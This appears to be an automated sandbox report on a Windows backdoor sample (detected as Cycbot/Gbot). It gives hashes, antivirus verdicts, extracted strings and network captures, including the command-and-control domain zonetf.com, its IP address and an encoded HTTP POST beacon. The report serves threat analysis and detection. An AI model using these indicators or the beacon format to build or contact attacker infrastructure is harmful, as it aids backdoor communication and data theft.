Analysis Date2015-01-26 13:08:00
MD55c6ef5d95e4eb0d3bd3b5403e5f49d20
SHA1a20fdd3916651fbfeac1f36fa510537cf9462da9

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 1de2bb20c3e222ae1b013ab99bdfbcec sha1: e84361dd027c9345f5e198396970a1707640a147 size: 69120
Section.rdata md5: 1da35566a87783f52a6cc4a57b2c5f9d sha1: 4adbcf1fed5b1e58bf1b0357d514ff76aab4e0df size: 2048
Section.data md5: e684f718ae615618f83138fabfc85748 sha1: 2263d7eb56935eeeef3b4924bc9a3956e59a803d size: 8192
Section.crt md5: 75fec42dcaa9f09e0205e6cc93e2397e sha1: d13187a33261d8366bf477d880e3c243f2d7c3e4 size: 512
Timestamp2005-09-12 22:06:06
PEhash9e3f1ae5e9cc74b49f96bec712f8b128bb064fef
IMPhash31b78e79eeca0e7e3e00aa7fda822b2f
AV360 Safeno_virus
AVAd-AwareGen:Variant.Kazy.2847
AVAlwil (avast)MalOb-IJ [Cryp]
AVArcabit (arcavir)Gen:Variant.Kazy.2847
AVAuthentiumW32/Goolbot.C.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVBullGuardGen:Variant.Kazy.2847
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Cycbot-8177
AVDr. WebTrojan.Fakealert.20170
AVEmsisoftGen:Variant.Kazy.2847
AVEset (nod32)Win32/Kryptik.KFV
AVFortinetW32/FakeAV.DO!tr.bdr
AVFrisk (f-prot)W32/Goolbot.C.gen!Eldorado
AVF-SecureGen:Variant.Kazy.2847
AVGrisoft (avg)Win32/Heur
AVIkarusBackdoor.Win32.Cycbot
AVK7Trojan ( 0020d5ad1 )
AVKasperskyBackdoor.Win32.Gbot.dkj
AVMalwareBytesno_virus
AVMcafeeBackDoor-EXI.gen.h
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.C
AVMicroWorld (escan)Gen:Variant.Kazy.2847
AVRisingTrojan.Win32.Generic.127B36E7
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot
AVTrend MicroBKDR_CYCBOT.SMIB
AVVirusBlokAda (vba32)Error Scanning File

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File\Device\Afd\Endpoint

Network Details:

DNSzonetf.com
Type: A
141.8.225.80
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz6jpJvvYvZqCai4gP4q4W8%2Bv6KYvnCHaV%2FjjsW%2BdYFuTOH70awEqjUW9PnC8iPhbz6Q%2Fs2rc%2FNoSuX4sKxzgho55v6w3mL2agmlqoDuNOFvPryqnfVSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 366a704a 76765976   BN6yLhbz6jpJvvYv
0x00000030 (00048)   5a714361 69346750 34713457 38253242   ZqCai4gP4q4W8%2B
0x00000040 (00064)   76364b59 766e4348 61562532 466a6a73   v6KYvnCHaV%2Fjjs
0x00000050 (00080)   57253242 64594675 544f4837 30617745   W%2BdYFuTOH70awE
0x00000060 (00096)   716a5557 39506e43 38695068 627a3651   qjUW9PnC8iPhbz6Q
0x00000070 (00112)   25324673 32726325 32464e6f 53755834   %2Fs2rc%2FNoSuX4
0x00000080 (00128)   734b787a 67686f35 35763677 336d4c32   sKxzgho55v6w3mL2
0x00000090 (00144)   61676d6c 716f4475 4e4f4676 50727971   agmlqoDuNOFvPryq
0x000000a0 (00160)   6e665653 72253246 65253242 56355a75   nfVSr%2Fe%2BV5Zu
0x000000b0 (00176)   52672533 44253344 20485454 502f312e   Rg%3D%3D HTTP/1.
0x000000c0 (00192)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000d0 (00208)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000e0 (00224)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x000000f0 (00240)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000100 (00256)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000110 (00272)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000120 (00288)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000130 (00304)   6f6e3a20 636c6f73 650d0a0d 0a         on: close....


Strings
...
040904b0
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
4*f*wZ
]^]7c6
**/[*a
ClearCommError
CloseHandle
CreateFileA
CreateStdAccessibleObject
@.data
DeleteCriticalSection
EnterCriticalSection
EnumResourceNamesA
EnumSystemLocalesA
ExitProcess
@f^t+c[V
g7W5ES`	
GetAncestor
GetCommandLineA
GetConsoleOutputCP
GetCPInfo
GetCurrentDirectoryW
GetCurrentProcess
GetCurrentThreadId
GetFullPathNameA
GetFullPathNameW
GetLastError
GetLocaleInfoW
GetModuleFileNameW
GetModuleHandleA
GetProcAddress
GetProcessHeap
GetThreadPriority
GetUserDefaultLCID
GetVersionExA
GlobalAlloc
HeapAlloc
HeapFree
HeapReAlloc
HeapSize
hhlFre
hhLibr
H!r#:V
InitializeCriticalSection
InterlockedDecrement
InterlockedIncrement
IsDebuggerPresent
IsValidCodePage
IsValidLocale
j}]:9c
JRi;@U
KERNEL32.dll
LCMapStringA
LCMapStringW
LeaveCriticalSection
LresultFromObject
l*)X:uQ
MessageBoxW
MultiByteToWideChar
n|2	z=
OLEACC.dll
Oxg$%R
*:,=*p
qO'Jtg
RaiseException
`.rdata
ReadFile
RPCRT4.dll
RtlUnwind
SEqo9W
SetEndOfFile
SetStdHandle
SetUnhandledExceptionFilter
Sz=f],0
TerminateProcess
!This program cannot be run in DOS mode.
*t^o*:
UnhandledExceptionFilter
UNs3NZ
USER32.dll
UuidCreate
VH*o!7m"
}}w*/3
w4zP*J
WideCharToMultiByte
w*:}L`
WriteConsoleA
WriteConsoleW
WriteFile
}Xt5HKH
yhAGs:
z*}V)N